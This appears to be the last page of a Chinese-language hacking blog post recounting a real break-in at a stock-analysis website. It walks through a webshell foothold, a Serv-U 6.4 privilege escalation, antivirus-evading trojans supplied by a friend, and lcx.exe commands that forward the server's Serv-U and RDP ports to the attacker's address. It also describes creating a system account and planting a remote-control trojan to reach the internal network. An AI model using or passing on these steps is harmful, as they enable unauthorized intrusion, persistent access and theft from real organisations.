入侵渗透股票分析名站

Real VNC的密码读取不出来,到了Serv-U的安装目录，试着对ServUDaemon.ini这个配置档进行改写，确定无权限写入


「只得试试Serv-U的本地权限提升漏洞了」我挖了一口凤梨冰说着，啧啧..最近咖啡喝多了，伤身

得注意的是，Serv-U版本为6.4若在提升权限成功以後，该进程会被结束或是服务会被关闭的

换句话说，便是当你提权一次以後，便会关闭，所以提升权限後得确定可以连上去并重新开起来

便想到将Serv-U的端口转发出来，看情况如何在来利用..

因为Aspx权限比Asp来的大，我们可以透过执行lcx转发端口的技术来应用

但因服务器上安装的杀毒会杀壳的特徵..
不管怎麽做都传不上去




在这里得谢谢一位朋友：剑行偏锋

没有你的支援，就没有这篇文章了，也感恩你提供破解的知识和分享免杀的木马

本地端执行lcx.exe –listen 43099 21

服务器执行lcx.exe –slave 219.70.＊.＊ 43099 127.0.0.1 43958





成功的转发出来了，在本地安装好Serv-U并连接，连接位置为127.0.0.1、帐号与密码皆使用默认设置的



并没办法新增一个高权限的帐号使用

只能使用WebShell提升权限了哦..





成功的新增了一个系统帐号了，现在连上3389管理吧



透过Lcx将3389端口转发出来

本地端执行lcx.exe –listen 43099 817

服务器执行lcx.exe –slave 219.70.＊.＊ 43099 127.0.0.1 3389

成功连接上以後，如上图的转发情况，便可以利用3389连接127.0.0.1:817



如下图，因为利用Serv-U提升权限，成功以後会被暂停或是结束，这时我们得重新把它开起来



後来进3389终端管理察看，发现了这三个IP的主要用处了..

透过Ping 服务器得知该位置为202.133.＊.52 专司於Web服务的应用



从上图得知，配置文建设置了SQL的存取位置

而且，更妙的在这里了哦..看看另一个IP位置做什麽用的



哦？我们来连接看看..看能不能找到什麽端倪哦



很特别吧？同一个服务器，三个IP位置各司其职，估计是路由做了限制

简单的修复漏洞以後，直接种上远控方便对内网的服务器进行管理

上一页  [1] [2] [3]